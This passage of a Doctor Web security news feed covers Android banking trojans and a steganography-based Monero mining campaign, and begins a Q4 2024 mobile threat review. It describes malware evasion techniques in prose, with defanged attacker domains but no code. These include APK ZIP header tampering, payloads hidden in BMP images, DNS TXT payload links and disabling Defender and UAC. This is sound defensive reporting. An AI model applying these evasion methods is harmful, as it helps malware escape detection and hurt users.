        (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1104.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1099.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1117.origin&lt;/b&gt;), along with some others.
    &lt;/p&gt;
    &lt;p&gt;
        Banking trojans like &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.797.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.817.origin&lt;/b&gt; 
        and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5435&lt;/b&gt; targeted Indian users.
        These trojans were camouflaged as software that was allegedly related to the credit institutions Airtel Payments Bank, PM KISAN, and IndusInd Bank. 
        In addition, Rewardsteal banking trojans (&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.719.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5147&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5443&lt;/b&gt;) 
        remained active. These primarily targeted Indian customers of banks like Axis bank, HDFC Bank, SBI, ICICI Bank, RBL bank, and Citi bank.
    &lt;/p&gt;
    &lt;p&gt;
        In Latin American counties, PixPirate (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1026.origin&lt;/b&gt;) trojan activity was observed; these trojans target Brazilian bank customers.
    &lt;/p&gt;
    &lt;p&gt;
        Among the trojans targeting European users were Anatsa (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.Anatsa.1.origin&lt;/b&gt;) and Copybara (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.15140&lt;/b&gt; and 
        &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1100.origin&lt;/b&gt;). The latter mainly targets users from Italy, the United Kingdom, and Spain.
    &lt;/p&gt;
    &lt;p&gt;
        During 2024, Doctor Web’s virus analysts observed an increase in the popularity of certain methods of protecting Android malware (primarily banking trojans) 
        from analysis and detection. In particular, attackers performed various manipulations with the ZIP format on which Android APK files are based. As a result, 
        many instruments of static analysis that use standard algorithms to work with ZIP archives are unable to correctly process such “damaged” files. At the same 
        time, the Android OS accepts such modified trojans as normal programs, allowing them to be installed and run.
    &lt;/p&gt;
    &lt;p&gt;
        One common technique is to manipulate the fields &lt;span class="string"&gt;compression method&lt;/span&gt; and &lt;span class="string"&gt;compressed size&lt;/span&gt; 
        in the local file header inside the APK. Threat actors intentionally specify the wrong values for the fields &lt;span class="string"&gt;compressed size&lt;/span&gt; 
        and &lt;span class="string"&gt;uncompressed size&lt;/span&gt; or write an incorrect or nonexistent compression method in the 
        &lt;span class="string"&gt;compression method&lt;/span&gt; field. Another option is to specify a method that does 
        not involve compression for the archive. The header fields &lt;span class="string"&gt;compressed size&lt;/span&gt; 
        and &lt;span class="string"&gt;uncompressed size&lt;/span&gt; will not match, although they should.
    &lt;/p&gt;
    &lt;p&gt;
        Another popular technique is to use incorrect information about the disk in the ECDR (End of Central Directory Record) and in the CD (Central Directory 
        that contains data about files and archive parameters). Both these parameters should match for a single archive. However, cybercriminals can specify 
        different values for these as if it were not a single archive, but a multi-archive.
    &lt;/p&gt;
    &lt;p&gt;
        Also widespread was a technique whereby a flag was set in the local file headers of some files in the archive, indicating that these files are encrypted. 
        In reality they are not encrypted but due to this, such an archive will be parsed incorrectly.
    &lt;/p&gt;
    &lt;p&gt;
        Along with manipulating the structure of APK files, malware creators also used other practices, such as modifying the 
        &lt;span class="string"&gt;AndroidManifest.xml&lt;/span&gt; configuration file of Android apps. In particular, they added garbage bytes &lt;span class="string"&gt;b'\x00'&lt;/span&gt; 
        to this file’s attribute structure, causing it to be read incorrectly.
    &lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="future"&gt;
    &lt;h2 class="alignCenter"&gt;Prospects and trends&lt;/h2&gt;
    &lt;p&gt;
        The past year has shown that cybercriminals are still actively enriching themselves at the expense of Android device owners. 
        Their main tools remain ad-displaying and banking trojans, malicious programs with spyware capabilities, and fraudulent software. 
        In this regard, we should expect the emergence of new threats of this type in 2025.
    &lt;/p&gt;
    &lt;p&gt;
        Despite the steps taken to improve the security of Google Play, this app catalog still remains an Android threat distribution source. 
        Therefore, new malicious and unwanted apps emerging in it should not be ruled out.
    &lt;/p&gt;
    &lt;p&gt;
        Another case of Android TV box sets being infected was detected last year, indicating that malware creators use different attack vectors. 
        It is quite possible that threat actors will not only turn their attention to such devices again, but will also continue to look for other 
        potential targets among the variety of Android gadgets.
    &lt;/p&gt;
    &lt;p&gt;
        It is possible that malware developers will continue to actively introduce new techniques that allow their malicious programs to bypass analysis and detection.
    &lt;/p&gt;
    &lt;p&gt;
        Doctor Web’s specialists continue to both monitor the evolution of mobile cyber threats and ensure that our users are protected. To improve your mobile device security, 
        install Dr.Web Security Space, which helps in the fight against malicious, unwanted, and other dangerous programs; fraudsters; and other threats.
    &lt;/p&gt;
&lt;/section&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/2024 review of virus activity on mobile devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;

</description></item><item><guid>https://news.drweb.com/show/?i=14976&amp;lng=en</guid><title>Doctor, where did you get these pictures? Using steganography in a cryptocurrency mining campaign.</title><link>https://news.drweb.com/show/?i=14976&amp;lng=en&amp;c=9</link><pubDate>Fri, 24 Jan 2025 07:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;January 24, 2025&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;When analyzing telemetry data, virus analysts at Doctor Web identified malware samples that, upon closer examination, turned out to be components of an active campaign to mine the Monero cryptocurrency. This campaign is notable because it is implemented as a series of malware chains, two of which are based on executing scripts that extract malicious payloads from BMP image files.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The campaign likely began in 2022 when our analysts first observed &lt;span class="string"&gt;Services.exe&lt;/span&gt;, a .NET application that launched a malicious VBscript. This script implements backdoor functionality by contacting the attacker's server and executing the scripts and files sent in response. For example, the malicious file &lt;span class="string"&gt;ubr.txt&lt;/span&gt;, a PowerShell script whose extension was changed from ps1 to txt, was downloaded to the victim's computer.&lt;/p&gt;
&lt;p&gt;The &lt;span class="string"&gt;ubr.txt&lt;/span&gt; script checks for miners that may already be installed on the compromised machine and replaces them with the versions the attackers provide. The files installed by the script are the SilentCryptoMiner miner and its configuration, which the hackers used to mine the Monero cryptocurrency.&lt;/p&gt;


&lt;p&gt;We have &lt;a target="_blank" rel="noopener noreferrer" href="https://news.drweb.com/show/?i=14920"&gt;reported&lt;/a&gt; on the use of &lt;a target="_blank" rel="noopener noreferrer" href="https://news.drweb.com/show/?i=14792&amp;lng=ru&amp;c=23"&gt;this miner&lt;/a&gt; by attackers who are attracted by its ease of configuration, its advanced capabilities for mining different types of cryptocurrencies and hiding from diagnostic utilities, and its ability to remotely manage all of the miners in the botnet via a web panel.&lt;/p&gt;

&lt;p&gt;As part of this campaign, the miner files are disguised as components of various software, such as the Zoom video conferencing application (&lt;span class="string"&gt;ZoomE.exe&lt;/span&gt; and &lt;span class="string"&gt;ZoomX.exe&lt;/span&gt;), Windows services (&lt;span class="string"&gt;Service32.exe&lt;/span&gt; and &lt;span class="string"&gt;Service64.exe&lt;/span&gt;), etc. Although there exist several sets of malicious modules with different names, they all perform the same tasks: removing other miners, installing a new miner, and delivering updates for it.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/1.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/1_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;PowerShell script &lt;span class="string"&gt;ubr.txt&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In addition, the miner accesses the getcert[.]net domain, which hosts the &lt;span class="string"&gt;m.txt&lt;/span&gt; file containing the cryptocurrency mining settings. This domain is also used in other infection chains.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/2.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/2_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The miner configuration included in the &lt;span class="string"&gt;m.txt&lt;/span&gt; file&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Later, fraudsters modified the attack methodology, making it much more interesting and incorporating steganography tools.&lt;/p&gt;

&lt;blockquote&gt;
    Steganography is a method of hiding information within other information. Unlike cryptography, which can draw attention to encrypted data, steganography allows information to be hidden inconspicuously, such as in an image. Many cybersecurity experts believe that the use of steganography to bypass defenses will grow in popularity.
&lt;/blockquote&gt;

&lt;div class="fx -part_2 fxItemsCenter"&gt;
    &lt;div class="paddXS paddYS noMarg cell"&gt;
        &lt;p class="alignCenter"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/3_1.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/3.png" alt="#drweb"&gt;&lt;/a&gt;
        &lt;/p&gt;
    &lt;/div&gt;
    &lt;div class="paddXS paddYS noMarg cell"&gt;
        &lt;p class="alignCenter"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/4_1.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/4.png" alt="#drweb"&gt;&lt;/a&gt;
        &lt;/p&gt;
    &lt;/div&gt;
  &lt;/div&gt;

&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;The image on the left (credit: &lt;a target="_blank" rel="noopener noreferrer" href="https://unsplash.com/@marekpiwnicki"&gt;Marek Piwnicki&lt;/a&gt;) contains a hidden image with the Dr.Web logo&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The second, more recent chain employs the Amadey trojan, which runs the PowerShell script &lt;span class="string"&gt;Async.ps1&lt;/span&gt;. The script downloads BMP images from the legitimate image-hosting site imghippo.com. A steganographic algorithm extracts two executables from the images: the &lt;a href="https://vms.drweb.com/search/?q=Trojan.PackedNET.2429&amp;lng=en"&gt;&lt;b&gt;Trojan.PackedNET.2429&lt;/b&gt;&lt;/a&gt; stealer and a payload that does the following:&lt;/p&gt;

&lt;ul&gt;
    &lt;li&gt;
            Disables the UAC prompt for administrators

    &lt;/li&gt;
    &lt;li&gt;
        Makes numerous exceptions to the built-in Windows Defender antivirus
    &lt;/li&gt;
    &lt;li&gt;Disables notifications in Windows&lt;/li&gt;
    &lt;li&gt;Creates a new task in &lt;span class="string"&gt;\Microsoft\Windows\WindowsBackup\&lt;/span&gt; with the name 'User'.&lt;/li&gt;
&lt;/ul&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/5.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/5_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Contents of the &lt;span class="string"&gt;Async1.ps&lt;/span&gt; script&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;During its execution, the task accesses the attackers' domains whose DNS TXT record contains the address of the payload. After downloading it, the archive containing BMP images is unpacked and the following files are launched:&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;span class="string"&gt;Cleaner.txt&lt;/span&gt;, a PowerShell script that removes all other miners,&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;span class="string"&gt;m.txt&lt;/span&gt;, a PowerShell script that extracts payloads from &lt;span class="string"&gt;m.Bmp&lt;/span&gt; and &lt;span class="string"&gt;IV.Bmp&lt;/span&gt; images. The payload inside the images is SilentCryptoMiner and the injector that runs it,&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;&lt;span class="string"&gt;Net.txt&lt;/span&gt;, a script that reads a DNS TXT record from the domains windowscdn[.]site and buyclients[.]xyz. This record contains a payload link pointing to raw.githack[.]com.&lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
    A DNS TXT record is an extension of the standard DNS record and contains data that helps to verify a domain. However, the domain owner can include any data in it, such as, in this case, a payload link.
&lt;/blockquote&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/6.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/6_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Contents of the archive with malicious images&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The miner modules are constantly evolving. Recently, the authors switched to using legitimate resources to host malicious images and the GitHub platform to store payloads. Additionally, we have observed modules that verify whether this malware is running in sandboxes and virtual machines.&lt;/p&gt;
&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/7.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/7_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;A module that checks the names of running applications against the names of common tools used by cybersecurity researchers&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;One of the wallets found in the miner's configuration was created in May 2022, and so far, it has received 340 XMR. However, the exchange rate of this cryptocurrency is experiencing a period of significant volatility, so in this case the fraudsters' profit could be 65–70 thousand USD. Judging by the wave-like shape of the hash rate curve, which indicates that the computers in the botnet are turned on and off regularly, this mining campaign mostly involves ordinary users located in the same group of time zones. On average, the hash rate is 3.3 million hashes per second, which allows compromised machines to earn the attackers 1 XMR every 40 hours or so.&lt;/p&gt;
&lt;p&gt;This campaign is just the tip of the iceberg in the world of steganography-based cyber threats and underscores the importance of being vigilant in the digital space. Doctor Web's recommendations remain unchanged: only install software from reliable sources, do not click on suspicious links, and do not disable antivirus protection when downloading files from the Internet.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/get_cert/getcert_en.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/get_cert/getcert_en_1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/p&gt;
&lt;p class="noMargY alignCenter"&gt;&lt;em&gt;Attack chain&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;a target="_blank" rel="noopener noreferrer" href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/get_cert%20campaign"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a target="_blank" rel="noopener noreferrer" href="https://vms.drweb.com/virus/?i=25898223"&gt;&lt;b&gt;SilentCryptoMiner&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=PowerShell.Starter.98&amp;lng=en"&gt;&lt;b&gt;PowerShell.Starter.98&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=PowerShell.DownLoader.1640&amp;lng=en"&gt;&lt;b&gt;PowerShell.DownLoader.1640&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=Trojan.PackedNET.2429&amp;lng=en"&gt;&lt;b&gt;Trojan.PackedNET.2429&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Read more about &lt;a href="https://vms.drweb.com/search/?q=VBS.DownLoader.2822&amp;lng=en"&gt;&lt;b&gt;VBS.DownLoader.2822&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=14950&amp;lng=en</guid><title>Doctor Web’s Q4 2024 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=14950&amp;lng=en&amp;c=9</link><pubDate>Thu, 26 Dec 2024 10:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;December 26, 2024&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojans were the malware programs most frequently detected in the fourth quarter of 2024 (Q4). The second most common threats were &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans, which are used in fraudulent schemes. Trojans from the &lt;b&gt;Android.Siggen&lt;/b&gt; family, capable of executing various malicious tasks, ranked third.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;Over the course of Q4, Doctor Web’s malware analysts discovered many threats on Google Play. Among them were numerous &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans and malware from the &lt;a href="https://vms.drweb.com/search/?q=Android.Subscription&amp;lng=en"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; families, which subscribe users to paid services. More &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans were also detected. In addition, threat actors distributed malicious apps protected with a sophisticated software packer.&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;PRINCIPAL TRENDS OF Q4 2024&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;High activity on the part of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans and &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fraudulent apps&lt;/li&gt;
      &lt;li&gt;The distribution of many malicious programs through the Google Play catalog&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;

  &lt;h2 class="alignCenter"&gt;According to statistics collected by Dr.Web Security Space for mobile devices&lt;/h2&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/01_malware_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/01_malware_q4_2024_en.1.png" alt="According to statistics collected by Dr.Web Security Space for mobile devices"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A trojan app that loads a website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.655.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.657.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;Trojan apps designed to display intrusive ads. Members of the &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Packed&amp;lng=en"&gt;&lt;b&gt;Android.Packed&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.57083&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for malicious applications protected with an ApkProtector software packer. Among them are banking trojans, spyware, and other malicious software.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
      &lt;dd&gt;This trojan is built into third-party WhatsApp messenger mods and camouflaged as Google library classes. While the host application is being used, &lt;a href="https://vms.drweb.com/search/?q=Android.Click.1751&amp;lng=en"&gt;&lt;b&gt;Android.Click.1751&lt;/b&gt;&lt;/a&gt; connects to one of the C&amp;C servers and receives two URLs from it. One of them is intended for Russian-speaking users, and the other is for everyone else. The trojan then displays a dialog box whose contents it has also received from a remote server. When a user clicks on the confirmation button, malware loads the corresponding link in the browser.&lt;/dd&gt;    
  &lt;/dl&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/02_unwanted_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/02_unwanted_q4_2024_en.1.png" alt="According to statistics collected by Dr.Web Security Space for mobile devices"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.FakeAntiVirus&amp;lng=en"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as &lt;a href="https://vms.drweb.com/search/?q=Tool.CloudInject&amp;lng=en"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt;). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, users can remotely manage these apps. They can block them, display custom dialogs, and track when other software is being installed or removed from a device, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.TrackView&amp;lng=en"&gt;&lt;b&gt;Program.TrackView&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, use the camera to record video and take photos, eavesdrop via the microphone, record audio, etc.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.SecretVideoRecorder&amp;lng=en"&gt;&lt;b&gt;Program.SecretVideoRecorder&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for various modifications of an application that is designed to record videos and take photos in the background, using built-in Android device cameras. It can operate covertly by allowing notifications about ongoing recordings to be disabled. It also allows an app’s icon and name to be replaced with fake ones. This functionality makes this software potentially dangerous.&lt;/dd&gt;
  &lt;/dl&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/03_riskware_q4_2024_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2024/december/review_mobile/03_riskware_q4_2024_en.1.png" alt="According to statistics collected by Dr.Web Security Space for mobile devices"&gt;
    &lt;/a&gt;
  &lt;/div&gt;

  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for Android programs that have been modified using the NP Manager utility. A special module is embedded in such apps, and it allows them to bypass digital signature verification once they have been modified.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.SilentInstaller&amp;lng=en"&gt;&lt;b&gt;Tool.SilentInstaller&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A riskware platform that allows applications to launch APK files without installing them. It creates a virtual runtime environment in the context of the apps in which they are integrated. The APK files launched with the help of this platform can operate as if they are part of such programs and can also obtain the same permissions.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.LuckyPatcher&amp;lng=en"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change the logic of their work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads specially prepared scripts from the Internet, which can be crafted and added to the common database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Packer&amp;lng=en"&gt;&lt;b&gt;Tool.Packer&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;A packer tool designed to protect Android applications from unauthorized modifications and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Tool.Androlua&amp;lng=en"&gt;&lt;b&gt;Tool.Androlua&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
      &lt;dd&gt;The detection name for some potentially dangerous versions of a specialized framework for developing Android software based on the Lua scripting language. The main logic of Lua-based apps resides in the corresponding scripts that are encrypted and decrypted by the interpreter upon execution. By default, this framework often requests access to a large number of system permissions in order to operate. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions. &lt;/dd&gt;
  &lt;/dl&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
